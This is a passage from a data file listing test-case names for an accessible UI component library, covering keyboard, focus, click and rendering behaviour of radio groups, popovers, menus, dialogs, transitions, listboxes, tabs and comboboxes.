value", "should guarantee the radio option order after a few unmounts", "should be possible to render a RadioGroupOption with a render prop", "should set the checked v-slot info to true for the selected item (testing with objects, because Vue proxies)", "should be possible to put classes on a RadioGroup", "should be possible to put classes on a RadioGroupOption", "should be possible to disable a RadioGroup", "should be possible to disable a RadioGroup.Option", "should guarantee the order of DOM nodes when performing actions", "should be possible to use a custom component using the `as` prop without crashing", "should use object equality by default", "should be possible to compare null values by a field", "should be possible to compare objects by a field", "should be possible to compare objects by a comparator function", "should be possible to reset to the default value if the form is reset (using objects)", "should be possible to tab to the first item", "should not change the selected element on focus", "should be possible to tab to the active item", "should not change the selected element on focus (when selecting the active item)", "should be possible to tab out of the radio group (no selected value)", "should be possible to tab out of the radio group (selected value)", "should go to the previous item when pressing the ArrowLeft key", "should go to the previous item when pressing the ArrowUp key", "should go to the next item when pressing the ArrowRight key", "should go to the next item when pressing the ArrowDown key", "should select the current option when pressing space", "should select the current option only once when pressing space", "should be possible to change the current radio group value when clicking on a radio option", "should be a no-op when clicking on the same item", "should be possible to submit a form with a value", "should be possible to submit a form with a complex value object", "should error when we are using a <RadioGroup.Option /> without a parent <RadioGroup />", "should expose internal data as a render prop", "should error when we are using a <PopoverButton /> without a parent <Popover />", "should error when we are using a <PopoverPanel /> without a parent <Popover />", "should error when we are using a <PopoverOverlay /> without a parent <Popover />", "should be possible to render a Popover without crashing", "should be possible to render a PopoverGroup with multiple Popover components", "should be possible to render a Popover using a render prop", "should expose a close function that closes the popover", "should expose a close function that closes the popover and restores to a specific element", "should expose a close function that closes the popover and restores to a ref", "should be possible to render a PopoverButton using a render prop", "should be possible to render a PopoverButton using a render prop and an `as` prop", "should be possible to render PopoverPanel using a render prop", "should be possible to always render the PopoverPanel if we provide it a `static` prop", "should be possible to use a different render strategy for the PopoverPanel", "should be possible to move the focus inside the panel to the first focusable element (very first link)", "should close the Popover, when PopoverPanel has the focus prop and you focus the open button", "should be possible to move the focus inside the panel to the first focusable element (skip hidden link)", "should be possible to move the focus inside the panel to the first focusable element (very first link) when the hidden render strategy is used", "should always open the PopoverPanel because of a wrapping OpenClosed component", "should always close the PopoverPanel because of a wrapping OpenClosed component", "should be possible to open the Popover with Enter", "should not be possible to open the popover with Enter when the button is disabled", "should be possible to close the popover with Enter when the popover is open", "should close other popover menus when we open a new one", "should close the Popover by pressing `Enter` on a PopoverButton inside a PopoverPanel", "should close the Popover menu, when pressing escape on the PopoverButton", "should close the Popover menu, when pressing escape on the PopoverPanel", "should be possible to close a sibling Popover when pressing escape on a sibling PopoverButton", "should be possible to Tab through the panel contents onto the next PopoverButton", "should be possible to place a focusable item in the PopoverGroup, and keep the Popover open when we focus the focusable element", "should close the Popover menu once we Tab out of the PopoverGroup", "should close the Popover menu once we Tab out of the Popover", "should close the Popover menu once we Tab out of a Popover without focusable elements", "should close the Popover when the PopoverPanel has a focus prop", "should close the Popover when the PopoverPanel has a focus prop (PopoverPanel uses a Portal)", "should close the Popover when the PopoverPanel has a focus prop (PopoverPanel uses a Portal), and focus the next focusable item in line", "should focus the previous PopoverButton when Shift+Tab on the second PopoverButton", "should focus the PopoverButton when pressing Shift+Tab when we focus inside the PopoverPanel", "should focus the PopoverButton when pressing Shift+Tab when we focus inside the PopoverPanel (inside a Portal)", "should focus the Popover.Button when pressing Shift+Tab when we focus inside the Popover.Panel (heuristc based portal)", "should be possible to focus the last item in the PopoverPanel when pressing Shift+Tab on the next PopoverButton", "should be possible to focus the last item in the PopoverPanel when pressing Shift+Tab on the next PopoverButton (using Portal's)", "should be possible to open the popover with Space", "should not be possible to open the popover with Space when the button is disabled", "should be possible to close the popover with Space when the popover is open", "should close the Popover by pressing `Space` on a PopoverButton inside a PopoverPanel", "should close the Popover by pressing `Enter` on a PopoverButton and go to the href of the `a` inside a PopoverPanel", "should be possible to open a popover on click", "should not be possible to open a popover on right click", "should not be possible to open a popover on click when the button is disabled", "should be possible to close a popover on click", "should be possible to close a Popover using a click on the PopoverOverlay", "should be possible to close the popover, and re-focus the button when we click outside on the body element", "should be possible to close the popover, and re-focus the button when we click outside on a non-focusable element", "should be possible to close the popover, by clicking outside the popover on another focusable element", "should be possible to close the popover, by clicking outside the popover on another element inside a focusable element", "should be possible to close the Popover by clicking on a PopoverButton inside a PopoverPanel", "should not close the Popover when clicking on a focusable element inside a static PopoverPanel", "should not close the Popover when clicking on a non-focusable element inside a static PopoverPanel", "should close the Popover when clicking outside of a static PopoverPanel", "should be possible to close the Popover by clicking on the Popover.Button outside the Popover.Panel", "should be possible to close the Popover by clicking on the Popover.Button outside the Popover.Panel (when using the `focus` prop)", "should not close the Popover if the focus is moved outside of the Popover but still in the same React tree using Portals", "should not close the Popover if the focus is moved outside of the Popover but still in the same React tree using nested Portals", "should be possible to nest Popover components and control them individually", "should error when we are using a <Popover.Button /> without a parent <Popover />", "should error when we are using a <Popover.Panel /> without a parent <Popover />", "should error when we are using a <Popover.Overlay /> without a parent <Popover />", "should be possible to render a Popover.Group with multiple Popover components", "should expose a close function that closes the popover and takes an event", "should be possible to get a ref to the Popover", "should be possible to use a Fragment with an optional ref", "should be possible to render a Popover.Button using a fragment", "should be possible to render a Popover.Button using a render prop", "should be possible to render a Popover.Button using a render prop and an `as` prop", "should be possible to render Popover.Panel using a render prop", "should be possible to always render the Popover.Panel if we provide it a `static` prop", "should be possible to use a different render strategy for the Popover.Panel", "should close the Popover, when Popover.Panel has the focus prop and you focus the open button", "should warn when you are using multiple `Popover.Button` components", "should warn when you are using multiple `Popover.Button` components (wrapped in a Transition)", "should not warn when you are using multiple `Popover.Button` components inside the `Popover.Panel`", "should not warn when you are using multiple `Popover.Button` components inside the `Popover.Panel` (wrapped in a Transition)", "should warn when you are using multiple `Popover.Button` components in a nested `Popover`", "should not warn when you are using multiple `Popover.Button` components in a nested `Popover.Panel`", "should be possible to wrap the Popover.Panel with a Transition component", "should close the Popover by pressing `Enter` on a Popover.Button inside a Popover.Panel", "should close the Popover menu, when pressing escape on the Popover.Button", "should close the Popover menu, when pressing escape on the Popover.Panel", "should be possible to close a sibling Popover when pressing escape on a sibling Popover.Button", "should be possible to Tab through the panel contents onto the next Popover.Button", "should be possible to place a focusable item in the Popover.Group, and keep the Popover open when we focus the focusable element", "should close the Popover menu once we Tab out of the Popover.Group", "should close the Popover when the Popover.Panel has a focus prop", "should close the Popover when the Popover.Panel has a focus prop (Popover.Panel uses a Portal)", "should close the Popover when the Popover.Panel has a focus prop (Popover.Panel uses a Portal), and focus the next focusable item in line", "should focus the previous Popover.Button when Shift+Tab on the second Popover.Button", "should focus the Popover.Button when pressing Shift+Tab when we focus inside the Popover.Panel", "should focus the Popover.Button when pressing Shift+Tab when we focus inside the Popover.Panel (inside a Portal)", "should be possible to focus the last item in the Popover.Panel when pressing Shift+Tab on the next Popover.Button", "should be possible to focus the last item in the Popover.Panel when pressing Shift+Tab on the next Popover.Button (using Portal's)", "should close the Popover by pressing `Space` on a Popover.Button inside a Popover.Panel", "should close the Popover by pressing `Enter` on a Popover.Button and go to the href of the `a` inside a Popover.Panel", "should be possible to close a Popover using a click on the Popover.Overlay", "should be possible to close the Popover by clicking on a Popover.Button inside a Popover.Panel", "should not close the Popover when clicking on a focusable element inside a static Popover.Panel", "should not close the Popover when clicking on a non-focusable element inside a static Popover.Panel", "should close the Popover when clicking outside of a static Popover.Panel", "should error when we are using a <Menu.Button /> without a parent <Menu />", "should error when we are using a <Menu.Items /> without a parent <Menu />", "should error when we are using a <Menu.Item /> without a parent <Menu />", "should be possible to render a Menu without crashing", "should be possible to render a Menu using a render prop", "should be possible to manually close the Menu using the exposed close function", "should be possible to render a Menu.Button using a render prop", "should be possible to render a Menu.Button using a render prop and an `as` prop", "should be possible to render Menu.Items using a render prop", "should be possible to always render the Menu.Items if we provide it a `static` prop", "should be possible to use a different render strategy for the Menu.Items", "should be possible to render a Menu.Item using a render prop", "should not override an explicit disabled prop on MenuItems child", "should be possible to conditionally render classNames (aka className can be a function?!)", "should be possible to swap the menu item with a button for example", "should mark all the elements between Menu.Items and Menu.Item with role none", "should be possible to wrap the Menu.Items with a Transition component", "should be possible to wrap the Menu.Items with a Transition.Child component", "should be possible to use a button as a menu item and invoke it upon Enter", "should be possible to open the menu with Enter", "should not be possible to open the menu with Enter when the button is disabled", "should have no active menu item when there are no menu items at all", "should focus the first non disabled menu item when opening with Enter", "should focus the first non disabled menu item when opening with Enter (jump over multiple disabled ones)", "should have no active menu item upon Enter key press, when there are no non-disabled menu items", "should be possible to close the menu with Enter when there is no active menuitem", "should be possible to close the menu with Enter and invoke the active menu item", "should be possible to open the menu with Space", "should not be possible to open the menu with Space when the button is disabled", "should focus the first non disabled menu item when opening with Space", "should focus the first non disabled menu item when opening with Space (jump over multiple disabled ones)", "should have no active menu item upon Space key press, when there are no non-disabled menu items", "should be possible to close the menu with Space when there is no active menuitem", "should be possible to close the menu with Space and invoke the active menu item", "should be possible to close an open menu with Escape", "should close when we use Tab", "should focus trap when we use Shift+Tab", "should be possible to open the menu with ArrowDown", "should not be possible to open the menu with ArrowDown when the button is disabled", "should be possible to use ArrowDown to navigate the menu items", "should be possible to use ArrowDown to navigate the menu items and skip the first disabled one", "should be possible to use ArrowDown to navigate the menu items and jump to the first non-disabled one", "should be possible to open the menu with ArrowUp and the last item should be active", "should not be possible to open the menu with ArrowUp and the last item should be active when the button is disabled", "should be possible to use ArrowUp to navigate the menu items and jump to the first non-disabled one", "should not be possible to navigate up or down if there is only a single non-disabled item", "should be possible to use ArrowUp to navigate the menu items", "should be possible to use the End key to go to the last menu item", "should be possible to use the End key to go to the last non disabled menu item", "should be possible to use the End key to go to the first menu item if that is the only non-disabled menu item", "should have no active menu item upon End key press, when there are no non-disabled menu items", "should be possible to use the PageDown key to go to the last menu item", "should be possible to use the PageDown key to go to the last non disabled menu item", "should be possible to use the PageDown key to go to the first menu item if that is the only non-disabled menu item", "should have no active menu item upon PageDown key press, when there are no non-disabled menu items", "should be possible to use the Home key to go to the first menu item", "should be possible to use the Home key to go to the first non disabled menu item", "should be possible to use the Home key to go to the last menu item if that is the only non-disabled menu item", "should have no active menu item upon Home key press, when there are no non-disabled menu items", "should be possible to use the PageUp key to go to the first menu item", "should be possible to use the PageUp key to go to the first non disabled menu item", "should be possible to use the PageUp key to go to the last menu item if that is the only non-disabled menu item", "should have no active menu item upon PageUp key press, when there are no non-disabled menu items", "should be possible to type a full word that has a perfect match", "should be possible to type a partial of a word", "should be possible to type words with spaces", "should not be possible to search for a disabled item", "should be possible to search for a word (case insensitive)", "should be possible to search for the next occurence", "should stay on the same item while keystrokes still match", "should be possible to open a menu on click", "should not be possible to open a menu on right click", "should not be possible to open a menu on click when the button is disabled", "should be possible to close a menu on click", "should be a no-op when we click outside of a closed menu", "should be possible to click outside of the menu which should close the menu", "should be possible to click outside of the menu which should close the menu (even if we press the menu button)", "should be possible to click outside of the menu on another menu button which should close the current menu and open the new menu", "should be possible to click outside of the menu, on an element which is within a focusable element, which closes the menu", "should be possible to hover an item and make it active", "should make a menu item active when you move the mouse over it", "should be a no-op when we move the mouse and the menu item is already active", "should be a no-op when we move the mouse and the menu item is disabled", "should not be possible to hover an item that is disabled", "should be possible to mouse leave an item and make it inactive", "should be possible to mouse leave a disabled item and be a no-op", "should be possible to click a menu item, which closes the menu", "should be possible to click a menu item, which closes the menu and invokes the @click handler", "should be possible to click a disabled menu item, which is a no-op", "should be possible focus a menu item, so that it becomes active", "should not be possible to focus a menu item which is disabled", "should not be possible to activate a disabled item", "should error when we are using a <MenuButton /> without a parent <Menu />", "should error when we are using a <MenuItems /> without a parent <Menu />", "should error when we are using a <MenuItem /> without a parent <Menu />", "should not crash when rendering no children at all", "should be possible to render a Menu using a default render prop", "should be possible to render a Menu using a template `as` prop", "should yell when we render a Menu using a template `as` prop (default) that contains multiple children (if we passthrough props)", "should be possible to render a MenuButton using a default render prop", "should be possible to render a MenuButton using a template `as` prop", "should be possible to render a MenuButton using a template `as` prop and a custom element", "should yell when we render a MenuButton using a template `as` prop that contains multiple children", "should be possible to render MenuItems using a default render prop", "should be possible to render MenuItems using a template `as` prop", "should yell when we render MenuItems using a template `as` prop that contains multiple children", "should be possible to always render the MenuItems if we provide it a `static` prop", "should be possible to use a different render strategy for the MenuItems", "should be possible to render MenuItem using a default render prop", "should be possible to render a MenuItem using a template `as` prop", "should yell when we render a MenuItem using a template `as` prop that contains multiple children", "should always open the MenuItems because of a wrapping OpenClosed component", "should always close the MenuItems because of a wrapping OpenClosed component", "should be possible to render a TransitionChild that inherits state from the Menu", "should not focus trap when we use Tab", "should not focus trap when we use Shift+Tab", "should error when we are using a <DialogOverlay /> without a parent <Dialog />", "should error when we are using a <DialogTitle /> without a parent <Dialog />", "should error when we are using a <DialogBackdrop /> without a parent <Dialog />", "should error when we are using a <DialogPanel /> without a parent <Dialog />", "should be possible to render a Dialog without crashing", "should be possible to access the ref on the DialogBackdrop", "should be possible to access the ref on the DialogPanel", "should complain when an `open` prop is missing", "should be able to explicitly choose role=dialog", "should be able to explicitly choose role=alertdialog", "should fall back to role=dialog for an invalid role", "should complain when an `open` prop is not a boolean", "should be possible to render a Dialog using a render prop", "should be possible to pass props to the Dialog itself", "should be possible to always render the Dialog if we provide it a `static` prop (and enable focus trapping based on `open`)", "should be possible to always render the Dialog if we provide it a `static` prop (and disable focus trapping based on `open`)", "should be possible to use a different render strategy for the Dialog", "should add a scroll lock to the html tag", "should wait to add a scroll lock to the html tag when unmount is false in a Transition", "scroll locking should work when transitioning between dialogs", "should remove the scroll lock when the open closed state is `Closing`", "should not have a scroll lock when the transition marked as not shown", "should be possible to render DialogOverlay using a render prop", "should throw an error if a DialogBackdrop is used without a DialogPanel", "should not throw an error if a DialogBackdrop is used with a DialogPanel", "should portal the DialogBackdrop", "should be possible to render DialogTitle using a render prop", "should be possible to render DialogDescription using a render prop", "should be possible to open a dialog from inside a Popover (and then close it)", "should be possible to open the Dialog via a Transition component", "should be possible to close the Dialog via a Transition component", "should be possible to close the dialog with Escape", "should be possible to close the dialog with Escape, when a field is focused", "should not be possible to close the dialog with Escape, when a field is focused but cancels the event", "should be possible to tab around when using the initialFocus ref", "should be possible to tab around when using the initialFocus ref on a component", "should not escape the FocusTrap when there is only 1 focusable element (going forwards)", "should not escape the FocusTrap when there is only 1 focusable element (going backwards)", "should be possible to close a Dialog using a click on the DialogOverlay", "should not close the Dialog when clicking on contents of the Dialog.Overlay", "should be possible to close the dialog, and re-focus the button when we click outside on the body element", "should be possible to close the dialog, and keep focus on the focusable element", "should stop propagating click events when clicking on the Dialog.Overlay", "should be possible to submit a form inside a Dialog", "should stop propagating click events when clicking on an element inside the Dialog", "should should be possible to click on removed elements without closing the Dialog", "should be possible to click on elements created by third party libraries", "should be possible to focus elements created by third party libraries", "should be possible to click elements inside the dialog when they reside inside a shadow boundary", "should close the Dialog if we click outside the DialogPanel", "should not close the Dialog if we click inside the DialogPanel", "should not close the dialog if opened during mouse up", "should not close the dialog if click starts inside the dialog but ends outside", "should be possible to open nested Dialog components and close them with `Escape`", "should be possible to open nested Dialog components and close them with `Outside Click`", "should be possible to open nested Dialog components and close them with `Click on Dialog.Overlay`", "should not steal the ref from the child", "should render without crashing", "should be possible to render a Transition without children", "should yell at us when we forget the required show prop", "should render a div and its children by default", "should passthrough all the props (that we do not use internally)", "should render another component if the `as` prop is used and its children by default", "should passthrough all the props (that we do not use internally) even when using an `as` prop", "should render nothing when the show prop is false", "should be possible to change the underlying DOM tag", "should be possible to use a render prop", "should yell at us when we forget to forward the ref when using a render prop", "should yell at us when we forget to wrap the `<Transition.Child />` in a parent <Transition /> component", "should be possible to render a Transition.Child without children", "should be possible to use a Transition.Root and a Transition.Child", "should be possible to nest transition components", "should be possible to change the underlying DOM tag of the Transition.Child components", "should be possible to change the underlying DOM tag of the Transition component and Transition.Child components", "should be possible to use render props on the Transition.Child components", "should be possible to use render props on the Transition and Transition.Child components", "should yell at us when we forgot to forward the ref on one of the Transition.Child components", "should yell at us when we forgot to forward a ref on the Transition component", "should support new lines in class lists", "should be possible to passthrough the transition classes", "should be possible to passthrough the transition classes and immediately apply the enter transitions when appear is set to true", "should fire only one event for a given component change", "should error when we are using a <Dialog.Overlay /> without a parent <Dialog />", "should error when we are using a <Dialog.Title /> without a parent <Dialog />", "should error when we are using a <Dialog.Backdrop /> without a parent <Dialog />", "should error when we are using a <Dialog.Panel /> without a parent <Dialog />", "should complain when the `open` and `onClose` prop are missing", "should complain when an `open` prop is provided without an `onClose` prop", "should complain when an `onClose` prop is provided without an `open` prop", "should complain when an `onClose` prop is not a function", "should be possible to render Dialog.Overlay using a render prop", "should throw an error if a Dialog.Backdrop is used without a Dialog.Panel", "should not throw an error if a Dialog.Backdrop is used with a Dialog.Panel", "should portal the Dialog.Backdrop", "should be possible to render Dialog.Title using a render prop", "should be possible to render Dialog.Description using a render prop", "should be possible to close a Dialog using a click on the Dialog.Overlay", "should not close the Dialog if it starts open and we click inside the Dialog when it has only a panel", "should close the Dialog if we click outside the Dialog.Panel", "should not close the Dialog if we click inside the Dialog.Panel", "should be possible to open nested Dialog components (visible when mounted) and close them with `Escape`", "should be possible to open nested Dialog components (visible when mounted) and close them with `Outside Click`", "should be possible to open nested Dialog components (visible when mounted) and close them with `Click on Dialog.Overlay`", "should be possible to open nested Dialog components (visible when always) and close them with `Escape`", "should be possible to open nested Dialog components (visible when always) and close them with `Outside Click`", "should error when we are using a <ListboxButton /> without a parent <Listbox />", "should error when we are using a <ListboxLabel /> without a parent <Listbox />", "should error when we are using a <ListboxOptions /> without a parent <Listbox />", "should error when we are using a <ListboxOption /> without a parent <Listbox />", "should be possible to render a Listbox without crashing", "should be possible to render a Listbox using a render prop", "should be possible to disable a Listbox", "should not crash in multiple mode", "null should be a valid value for the Listbox", "should be possible to use the by prop (as a string) with a null initial value", "should be possible to use the by prop (as a string) with a null listbox option", "should be possible to use completely new objects while rendering (single mode)", "should be possible to use completely new objects while rendering (multiple mode)", "should be possible to render a ListboxLabel using a render prop", "should be possible to render a ListboxLabel using a render prop and an `as` prop", "should be possible to render a ListboxButton using a render prop", "should be possible to render a ListboxButton using a render prop and an `as` prop", "should be possible to render a ListboxButton and a ListboxLabel and see them linked together", "should be possible to render ListboxOptions using a render prop", "should be possible to always render the ListboxOptions if we provide it a `static` prop", "should be possible to use a different render strategy for the ListboxOptions", "should be possible to render a ListboxOption using a render prop", "should expose the value via the render prop", "should be possible to reset to the default value in multiple mode", "should be possible to swap the Listbox option with a button for example", "should always open the ListboxOptions because of a wrapping OpenClosed component", "should always close the ListboxOptions because of a wrapping OpenClosed component", "should be possible to open the listbox with Enter", "should not be possible to open the listbox with Enter when the button is disabled", "should be possible to open the listbox with Enter, and focus the selected option", "should be possible to open the listbox with Enter, and focus the selected option (when using the `hidden` render strategy)", "should be possible to open the listbox with Enter, and focus the selected option (with a list of objects)", "should have no active listbox option when there are no listbox options at all", "should focus the first non disabled listbox option when opening with Enter", "should focus the first non disabled listbox option when opening with Enter (jump over multiple disabled ones)", "should have no active listbox option upon Enter key press, when there are no non-disabled listbox options", "should be possible to close the listbox with Enter when there is no active listboxoption", "should be possible to close the listbox with Enter and choose the active listbox option", "should be possible to open the listbox with Space", "should not be possible to open the listbox with Space when the button is disabled", "should be possible to open the listbox with Space, and focus the selected option", "should focus the first non disabled listbox option when opening with Space", "should focus the first non disabled listbox option when opening with Space (jump over multiple disabled ones)", "should have no active listbox option upon Space key press, when there are no non-disabled listbox options", "should be possible to close the listbox with Space and choose the active listbox option", "should be possible to close an open listbox with Escape", "should focus trap when we use Tab", "should be possible to open the listbox with ArrowDown", "should not be possible to open the listbox with ArrowDown when the button is disabled", "should be possible to open the listbox with ArrowDown, and focus the selected option", "should be possible to use ArrowDown to navigate the listbox options", "should be possible to use ArrowDown to navigate the listbox options and skip the first disabled one", "should be possible to use ArrowDown to navigate the listbox options and jump to the first non-disabled one", "should be possible to use ArrowRight to navigate the listbox options", "should be possible to open the listbox with ArrowUp and the last option should be active", "should not be possible to open the listbox with ArrowUp and the last option should be active when the button is disabled", "should be possible to open the listbox with ArrowUp, and focus the selected option", "should be possible to use ArrowUp to navigate the listbox options and jump to the first non-disabled one", "should not be possible to navigate up or down if there is only a single non-disabled option", "should be possible to use ArrowUp to navigate the listbox options", "should be possible to use ArrowLeft to navigate the listbox options", "should be possible to use the End key to go to the last listbox option", "should be possible to use the End key to go to the last non disabled listbox option", "should be possible to use the End key to go to the first listbox option if that is the only non-disabled listbox option", "should have no active listbox option upon End key press, when there are no non-disabled listbox options", "should be possible to use the PageDown key to go to the last listbox option", "should be possible to use the PageDown key to go to the last non disabled listbox option", "should be possible to use the PageDown key to go to the first listbox option if that is the only non-disabled listbox option", "should have no active listbox option upon PageDown key press, when there are no non-disabled listbox options", "should be possible to use the Home key to go to the first listbox option", "should be possible to use the Home key to go to the first non disabled listbox option", "should be possible to use the Home key to go to the last listbox option if that is the only non-disabled listbox option", "should have no active listbox option upon Home key press, when there are no non-disabled listbox options", "should be possible to use the PageUp key to go to the first listbox option", "should be possible to use the PageUp key to go to the first non disabled listbox option", "should be possible to use the PageUp key to go to the last listbox option if that is the only non-disabled listbox option", "should have no active listbox option upon PageUp key press, when there are no non-disabled listbox options", "should not be possible to search for a disabled option", "should focus the ListboxButton when we click the ListboxLabel", "should not focus the ListboxButton when we right click the ListboxLabel", "should be possible to open the listbox on click", "should not be possible to open the listbox on right click", "should not be possible to open the listbox on click when the button is disabled", "should be possible to open the listbox on click, and focus the selected option", "should be possible to close a listbox on click", "should be a no-op when we click outside of a closed listbox", "should be possible to click outside of the listbox which should close the listbox", "should be possible to click outside of the listbox on another listbox button which should close the current listbox and open the new listbox", "should be possible to click outside of the listbox which should close the listbox (even if we press the listbox button)", "should be possible to hover an option and make it active", "should make a listbox option active when you move the mouse over it", "should be a no-op when we move the mouse and the listbox option is already active", "should be a no-op when we move the mouse and the listbox option is disabled", "should not be possible to hover an option that is disabled", "should be possible to mouse leave an option and make it inactive", "should be possible to mouse leave a disabled option and be a no-op", "should be possible to click a listbox option, which closes the listbox", "should be possible to click a disabled listbox option, which is a no-op", "should be possible focus a listbox option, so that it becomes active", "should not be possible to focus a listbox option which is disabled", "should be possible to pass multiple values to the Listbox component", "should make the first selected option the active item", "should keep the listbox open when selecting an item via the keyboard", "should toggle the selected state of an option when clicking on it", "should toggle the selected state of an option when clicking on it (using objects instead of primitives)", "should trigger the `change` when the tab changes", "should error when we are using a <TabList /> without a parent <TabGroup /> component", "should error when we are using a <Tab /> without a parent <TabGroup /> component", "should error when we are using a <TabPanels /> without a parent <TabGroup /> component", "should error when we are using a <TabPanel /> without a parent <TabGroup /> component", "should be possible to render TabGroup without crashing", "should be possible to render the TabPanels first, then the TabList", "should guarantee the order when injecting new tabs dynamically", "should guarantee the order of DOM nodes when reversing the tabs and panels themselves, then performing actions (controlled component)", "should guarantee the order of DOM nodes when reversing the tabs and panels themselves, then performing actions (uncontrolled component)", "should expose the `selectedIndex` on the `Tabs` component", "should expose the `selectedIndex` on the `TabList` component", "should expose the `selectedIndex` on the `TabPanels` component", "should expose the `selected` state on the `Tab` components", "should expose the `selected` state on the `TabPanel` components", "should jump to the nearest tab when the defaultIndex is out of bounds (-2)", "should jump to the nearest tab when the defaultIndex is out of bounds (+5)", "should jump to the next available tab when the defaultIndex is a disabled tab", "should jump to the next available tab when the defaultIndex is a disabled tab and wrap around", "should not change the Tab if the defaultIndex changes", "should select first tab if no tabs were provided originally", "should select first tab if no tabs were provided originally (with a defaultIndex of 1)", "should not change the tab in a controlled component if you do not respond to the @change", "should be possible to change active tab controlled and uncontrolled", "should jump to the nearest tab when the selectedIndex is out of bounds (-2)", "should jump to the nearest tab when the selectedIndex is out of bounds (+5)", "should jump to the next available tab when the selectedIndex is a disabled tab", "should jump to the next available tab when the selectedIndex is a disabled tab and wrap around", "should prefer selectedIndex over defaultIndex", "should wrap around when overflowing the index when using a controlled component", "should wrap around when underflowing the index when using a controlled component", "should be possible to tab to the default initial first tab", "should be possible to tab to the default index tab", "should be possible to go to the next item (activation = `auto`)", "should be possible to go to the next item (activation = `manual`)", "should wrap around at the end (activation = `auto`)", "should wrap around at the end (activation = `manual`)", "should not be possible to go right when in vertical mode (activation = `auto`)", "should not be possible to go right when in vertical mode (activation = `manual`)", "should be possible to go to the previous item (activation = `auto`)", "should be possible to go to the previous item (activation = `manual`)", "should wrap around at the beginning (activation = `auto`)", "should wrap around at the beginning (activation = `manual`)", "should not be possible to go left when in vertical mode (activation = `auto`)", "should not be possible to go left when in vertical mode (activation = `manual`)", "should not be possible to go down when in horizontal mode (activation = `auto`)", "should not be possible to go down when in horizontal mode (activation = `manual`)", "should be possible to go to the first focusable item (activation = `auto`)", "should be possible to go to the first focusable item (activation = `manual`)", "should be possible to activate the focused tab", "should be possible to click on a tab to focus it", "should be a no-op when clicking on a disabled tab", "should be possible to go to the next item containing a Dialog component", "should trigger the `onChange` when the tab changes", "should error when we are using a <Tab.List /> without a parent <Tab.Group /> component", "should error when we are using a <Tab /> without a parent <Tab.Group /> component", "should error when we are using a <Tab.Panels /> without a parent <Tab.Group /> component", "should error when we are using a <Tab.Panel /> without a parent <Tab.Group /> component", "should be possible to render Tab.Group without crashing", "should be possible to render the Tab.Panels first, then the Tab.List", "should be possible to render using as={Fragment}", "should be possible to render using multiple as={Fragment}", "should expose the `selectedIndex` on the `Tab.Group` component", "should expose the `selectedIndex` on the `Tab.List` component", "should expose the `selectedIndex` on the `Tab.Panels` component", "should expose the `selected` state on the `Tab.Panel` components", "should not change the tab in a controlled component if you do not respond to the onChange", "should error when we are using a <Listbox.Button /> without a parent <Listbox />", "should error when we are using a <Listbox.Label /> without a parent <Listbox />", "should error when we are using a <Listbox.Options /> without a parent <Listbox />", "should error when we are using a <Listbox.Option /> without a parent <Listbox />", "should be possible to render a Listbox.Label using a render prop", "should be possible to render a Listbox.Label using a render prop and an `as` prop", "should be possible to render a Listbox.Button using a render prop", "should be possible to render a Listbox.Button using a render prop and an `as` prop", "should be possible to render a Listbox.Button and a Listbox.Label and see them linked together", "should be possible to render Listbox.Options using a render prop", "should be possible to always render the Listbox.Options if we provide it a `static` prop", "should be possible to use a different render strategy for the Listbox.Options", "should be possible to render a Listbox.Option using a render prop", "should be possible to wrap the Listbox.Options with a Transition component", "should focus the Listbox.Button when we click the Listbox.Label", "should not focus the Listbox.Button when we right click the Listbox.Label", "should be possible to click outside of the listbox, on an element which is within a focusable element, which closes the listbox", "should be possible to submit a form by pressing enter", "should yell at us when we forget to wrap the `<TransitionChild />` in a parent <Transition /> component", "should be possible to render a TransitionChild without children", "should be possible to change the underlying DOM tag of the TransitionChild components", "should be possible to change the underlying DOM tag of the Transition component and TransitionChild components", "should be possible to use render props on the TransitionChild components", "should be possible to use render props on the Transition and TransitionChild components", "should yell at us when we forgot to forward the ref on one of the TransitionChild components", "should transition in completely (duration defined in seconds)", "should transition out completely (render strategy = hidden)", "should transition in and out completely (render strategy = hidden)", "should not unmount the whole tree when some children are still transitioning", "should fire events for all the stages", "should error when we are using a <Combobox.Button /> without a parent <Combobox />", "should error when we are using a <Combobox.Label /> without a parent <Combobox />", "should error when we are using a <Combobox.Options /> without a parent <Combobox />", "should error when we are using a <Combobox.Option /> without a parent <Combobox />", "should be possible to render a Combobox without crashing", "should guarantee the order of options based on `order` when performing actions", "should be possible to render a Combobox using a render prop", "should be possible to disable a Combobox", "should not crash when a defaultValue is not given", "should close the Combobox when the input is blurred", "selecting an option puts the value into Combobox.Input when displayValue is not provided", "selecting an option puts the display value into Combobox.Input when displayValue is provided", "selecting an option puts the display value into Combobox.Input when displayValue is provided (when value is undefined)", "conditionally rendering the input should allow changing the display value", "should be possible to override the `type` on the input", "should move the caret to the end of the input when syncing the value", "should be possible to render a Combobox.Label using a render prop", "should be possible to link Input/Button and Label if Label is rendered last", "should be possible to render a Combobox.Label using a render prop and an `as` prop", "should be possible to render a Combobox.Button using a render prop", "should be possible to render a Combobox.Button using a render prop and an `as` prop", "should be possible to render a Combobox.Button and a Combobox.Label and see them linked together", "should be possible to render Combobox.Options using a render prop", "should be possible to always render the Combobox.Options if we provide it a `static` prop", "should be possible to use a different render strategy for the Combobox.Options", "should be possible to render a Combobox.Option using a render prop", "should be possible to swap the Combobox option with a button for example", "should mark all the elements between Combobox.Options and Combobox.Option with role none", "should be possible to wrap the Combobox.Options with a Transition component", "should be possible to open the combobox with Enter", "should not be possible to open the combobox with Enter when the button is disabled", "should be possible to open the combobox with Enter, and focus the selected option", "should be possible to open the combobox with Enter, and focus the selected option (when using the `hidden` render strategy)", "should be possible to open the combobox with Enter, and focus the selected option (with a list of objects)", "should have no active combobox option when there are no combobox options at all", "should be possible to open the combobox with Space", "should not be possible to open the combobox with Space when the button is disabled", "should be possible to open the combobox with Space, and focus the selected option", "should have no active combobox option upon Space key press, when there are no non-disabled combobox options", "should be possible to close an open combobox with Escape", "should not propagate the Escape event when the combobox is open", "should propagate the Escape event when the combobox is closed", "should be possible to open the combobox with ArrowDown", "should not be possible to open the combobox with ArrowDown when the button is disabled", "should be possible to open the combobox with ArrowDown, and focus the selected option", "should be possible to open the combobox with ArrowUp and the last option should be active", "should not be possible to open the combobox with ArrowUp and the last option should be active when the button is disabled", "should be possible to open the combobox with ArrowUp, and focus the selected option", "should be possible to use ArrowUp to navigate the combobox options and jump to the first non-disabled one", "should be possible to close the combobox with Enter and choose the active combobox option", "pressing Tab should select the active item and move to the next DOM node", "pressing Shift+Tab should select the active item and move to the previous DOM node", "should bubble escape when using `static` on Combobox.Options", "should bubble escape when not using Combobox.Options at all", "should sync the input field correctly and reset it when pressing Escape", "should be possible to use ArrowDown to navigate the combobox options", 